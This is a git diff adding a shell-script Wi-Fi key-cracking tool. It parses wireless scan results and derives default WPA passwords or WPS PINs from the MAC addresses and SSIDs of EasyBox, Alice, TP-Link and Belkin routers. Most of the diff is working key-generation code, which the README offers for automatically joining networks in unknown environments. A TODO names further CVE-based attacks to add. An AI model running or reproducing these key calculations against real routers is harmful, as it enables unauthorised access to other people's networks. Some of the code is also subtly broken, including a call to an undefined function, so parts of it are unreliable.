10 files changed, 294 insertions, 0 deletions
diff --git a/recon/inspect_wifi/.gitignore b/recon/inspect_wifi/.gitignore
new file mode 100644
index 00000000..05ba1603
--- /dev/null
+++ b/recon/inspect_wifi/.gitignore
@@ -0,0 +1 @@
+/etc/autowifi/wifi_keys
diff --git a/recon/inspect_wifi/README.md b/recon/inspect_wifi/README.md
new file mode 100644
index 00000000..3e0d8dce
--- /dev/null
+++ b/recon/inspect_wifi/README.md
@@ -0,0 +1,49 @@
+# Autowifi
+Author: makefu,lassulus
+
+Status: Pre-Alpha - it will most likely break if you try to use it
+
+# Contact
+
+twitter: @krebsbob ,@makefoo 
+
+IRC: freenode #krebs
+
+# Goals
+Goal of autowifi is to provide a tool which automatically can connect to
+networks in an unknown environment.
+
+This can either be done by connecting to open networks, known networks
+(whitelist) or by calculating weak default wpa keys (for example easybox
+default passwords).
+
+# Audience
+Due to the current status of the project the target audience are 
+linux users with technical background .
+
+# Usage
+    
+    # all as root
+    # try to find networks to connect to around you
+    usr/bin/autowifi_dryrun quiet
+
+    # start the autowifi daemon which tries to stay in networks all the time
+    usr/bin/autowifi
+
+# Plugins
+All tests to open up networks are implemented in plugins in
+    usr/lib/autowifi/plugins
+
+## Run a single Plugin
+This can be used for testing purposes, e.g. test a single plugin against given networks directly
+    
+    # try out the easybox keygen
+    usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style)
+
+    #e.g.
+    usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]"
+
+# Disclaimer
+- use at own risk
+- only run in lab environment
+- you break it, you buy it
diff --git a/recon/inspect_wifi/TODO b/recon/inspect_wifi/TODO
new file mode 100644
index 00000000..ddd59818
--- /dev/null
+++ b/recon/inspect_wifi/TODO
@@ -0,0 +1,9 @@
+more intelligent autoconnect (open first, encrypted second etc.)
+    perform initial scan on startup of unscanned networks
+    sort networks by bandwidth and connect
+profiles ala netcfg/netctl
+better profile hooks
+
+Implement:
+    - Droid Default WPA2 Pass for HotSpot: CVE-2013-4622: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4622
+    - EasyBox 802/803 default WPS Pin: http://packetstormsecurity.com/files/122698/SA-20130805-0.txt
diff --git a/recon/inspect_wifi/inspector_wifi b/recon/inspect_wifi/inspector_wifi
new file mode 100755
index 00000000..06f37ddb
--- /dev/null
+++ b/recon/inspect_wifi/inspector_wifi
@@ -0,0 +1,75 @@
+#!/bin/sh
+# Usage; sudo iwlist wlan0 scan | ./inspector_wifi
+#
+#
+set -eu
+
+cd "$(dirname "$(readlink -f "$0")")"
+echo "waiting for iwlist scan data..." >&2
+
+crack_wifi(){
+  for i in plugins/*;do
+    if RET=$(./$i "$@" 2>/dev/null);then
+      echo "$@ - with crack $i succeeded - Key is $RET"
+    fi
+  done
+}
+
+shell_escape(){
+  sed 's/./\\&/g'
+}
+remove_quotes(){
+  sed 's/^"\|"$//g'
+}
+
+
+iwlist_scan_parser(){
+    count=0
+    while read line;
+    do
+        case "$line" in
+
+            *"Cell "*)
+                if [ $count -ne  0 ];then
+                  crack_wifi "$ESSID" $MAC $CHANNEL any_encryption
+                fi
+                WPA=0
+                WPA2=0
+                : $((count+=1))
+                MAC=${line#*Address: }
+                ;;
+            *Channel:*)
+                CHANNEL=${line#*:}
+                ;;
+            *Quality=*)
+                QUALITY="`printf '%s' ${line#*Quality=} | cut -d/  -f 1`"
+                ;;
+            *"Encryption key:"*)
+                ENCRYPTION=${line#*key:}
+                ;;
+            *ESSID:*)
+              ESSID=$(echo "${line#*ESSID:}" | remove_quotes)
+                ;;
+            *"IE: IEEE 802.11i/WPA2"*)
+                WPA2=1
+                ;;
+            *"IE: WPA Version 1"*)
+                WPA=1
+                ;;
+            *);; #important, do not delete!
+        esac
+    done;
+    crack_wifi "$ESSID" $MAC $CHANNEL any_encryption
+    echo WIFI_COUNT=$count
+}
+
+wifi_init(){
+  iwlist_scan_parser
+}
+
+loop_networks(){
+    for i in `seq 1 $WIFI_COUNT`; do
+        loop_over_cracks "$i"
+    done
+}
+wifi_init
diff --git a/recon/inspect_wifi/plugins/01open b/recon/inspect_wifi/plugins/01open
new file mode 100755
index 00000000..881f47ea
--- /dev/null
+++ b/recon/inspect_wifi/plugins/01open
@@ -0,0 +1,6 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION 
+if [ "$4" == "[ESS]" ]; then
+    exit 0
+fi
+exit 1
diff --git a/recon/inspect_wifi/plugins/02alice b/recon/inspect_wifi/plugins/02alice
new file mode 100755
index 00000000..f30acc3a
--- /dev/null
+++ b/recon/inspect_wifi/plugins/02alice
@@ -0,0 +1,23 @@
+#!/bin/sh
+# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm:
+# Based on Poc from 
+#    http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html
+#
+#
+# ESSID MAC CHANNEL ENCRYPTION 
+
+cd $(dirname $(readlink -f $0))
+. ./plugin_core
+
+parse_plugin_args "$@"
+
+if ! check_vendor_mac $VENDOR_MAC "00255E" ;then
+  echo "$VENDOR_MAC not affected"
+  exit 1
+fi
+
+# printf always makes string to lower, need that for correct md5sum
+ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) 
+TMP=$(printf $ETHMAC | md5sum)
+printf ${TMP:0:12} | base64
+exit 0
diff --git a/recon/inspect_wifi/plugins/02easybox b/recon/inspect_wifi/plugins/02easybox
new file mode 100755
index 00000000..58816f25
--- /dev/null
+++ b/recon/inspect_wifi/plugins/02easybox
@@ -0,0 +1,36 @@
+#!/bin/sh
+#ESSID MAC CHANNEL ENCRYPTION WPA WPA2
+
+cd $(dirname $(readlink -f $0))
+. ./plugin_core
+parse_plugin_args "$@"
+
+if ! echo "$ESSID" | grep -q '\(EasyBox-\|Arcor-\|Vodafone-\)'; then
+    echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" 
+    exit 1
+else
+    # Fill up to 4 places with zeros, if necessary:
+    deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g')
+    #
+    # The digits M9 to M12 are just the last digits (9.-12.) of the MAC:
+    hexi=$(echo ${MAC:8:4} | sed 's/./& /g')
+    #echo 'M4 (Hex): ' ${hexi[@]}
+    # K1 = last byte of (d0 + d1 + h2 + h3)
+    # K2 = last byte of (h0 + h1 + d2 + d3)
+    c1=$(printf "%d + %d + %d + %d" ${deci:0:1} ${deci:2:1} 0x${hexi:4:1} 0x${hexi:6:1})
+    c2=$(printf "%d + %d + %d + %d" 0x${hexi:0:1} 0x${hexi:2:1} ${deci:4:1} ${deci:6:1})
+    K1=$((($c1)%16))
+    K2=$((($c2)%16))
+    #printf "K1: %x\n" $K1
+    #printf "K2: %x\n" $K2
+    X1=$((K1^${deci:6:1}))
+    X2=$((K1^${deci:4:1}))
+    X3=$((K1^${deci:2:1}))
+    Y1=$((K2^0x${hexi:2:1}))
+    Y2=$((K2^0x${hexi:4:1}))
+    Y3=$((K2^0x${hexi:6:1}))
+    Z1=$((0x${hexi:4:1}^${deci:6:1}))
+    Z2=$((0x${hexi:6:1}^${deci:4:1}))
+    Z3=$((K1^K2))
+    printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F
+fi
diff --git a/recon/inspect_wifi/plugins/02tplink b/recon/inspect_wifi/plugins/02tplink
new file mode 100755
index 00000000..522c0845
--- /dev/null
+++ b/recon/inspect_wifi/plugins/02tplink
@@ -0,0 +1,24 @@
+#!/bin/sh
+# Implementation of TP-Link default WPA Key
+# Based on 
+#   http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481 
+
+cd $(dirname $(readlink -f $0))
+. ./plugin_core
+
+parse_plugin_args "$@"
+
+if ! check_vendor_mac $VENDOR_MAC F8D111; then
+  echo "$VENDOR_MAC not affected"
+  exit 1
+fi
+
+if echo "$ESSID" | grep -q '^tp'; then
+  echo "$ESSID not affected" 
+  exit 1
+fi
+
+
+# printf always makes string to lower, need that for correct md5sum
+printf "${MAC:4:12}" 
+exit 0
diff --git a/recon/inspect_wifi/plugins/11belkin_wps b/recon/inspect_wifi/plugins/11belkin_wps
new file mode 100755
index 00000000..65448ad0
--- /dev/null
+++ b/recon/inspect_wifi/plugins/11belkin_wps
@@ -0,0 +1,30 @@
+#!/bin/sh
+
+cd $(dirname $(readlink -f $0))
+. ./plugin_core
+parse_plugin_args "$@"
+
+if ! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B; then
+  echo "VENDOR MAC $VENDOR_MAC not affected" 
+  exit 1
+fi
+
+calc_belkin(){
+  PRIVATE_MAC=${1}
+  p=$((0x$PRIVATE_MAC % 10000000))
+    wps_pin_checksum(){
+      pin=$1
+      accum=0
+      while [ $pin -ne 0 ];do
+        accum=$((accum + (3 * (pin % 10)) ))
+        pin=$((pin/10))
+        accum=$((accum + pin %10 ))
+        pin=$((pin/10))
+      done
+      echo $(( (10 - accum % 10) % 10))
+    }
+  printf "%07d%d" $p $(wps_pin_checksum $p)
+  return 0
+}
+
+printf "WPS-PIN: %s" $(calc_belkin ${PRIVATE_MAC})
diff --git a/recon/inspect_wifi/plugins/plugin_core b/recon/inspect_wifi/plugins/plugin_core
new file mode 100644
index 00000000..e79a3c05
--- /dev/null
+++ b/recon/inspect_wifi/plugins/plugin_core
@@ -0,0 +1,41 @@
+#!/bin/sh
+parse_plugin_args(){
+    [ $# -ne 4 ] && plugin_usage && exit 1
+    # convenience function to put args in ENV variables
+    ESSID="$1"
+
+    # mac is returned without colon
+    MAC=$(printf "%s" "$2" | sed 's/://g')
+    # split up the mac address to vendor and private part
+    VENDOR_MAC=${MAC:0:6}
+    PRIVATE_MAC=${MAC:6:12}
+    CHANNEL="$3"
+    ENC="$4"
+    if [ ${#MAC} -ne 12 ] ;then
+        echo "MAC malformed"
+        exit 1
+    fi
+}
+plugin_usage(){
+    cat << EOF
+usage: $0 ESSID MAC CHANNEL ENC"
+
+    ESSID   - string
+    MAC     - 00:11:22:33:44:55
+    CHANNEL - 4
+    ENC     - wpa
+EOF
+    
+}
+
+check_vendor_mac(){
+  needle="$(printf $1 | tr '[A-Z]' '[a-z]')"
+  shift
+  for i in "$@";do
+    [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0
+  done
+  return 1
+}
+check_painmode(){
+    test -z "${painmode:-}" && echo "painmode required" && exit 1
+}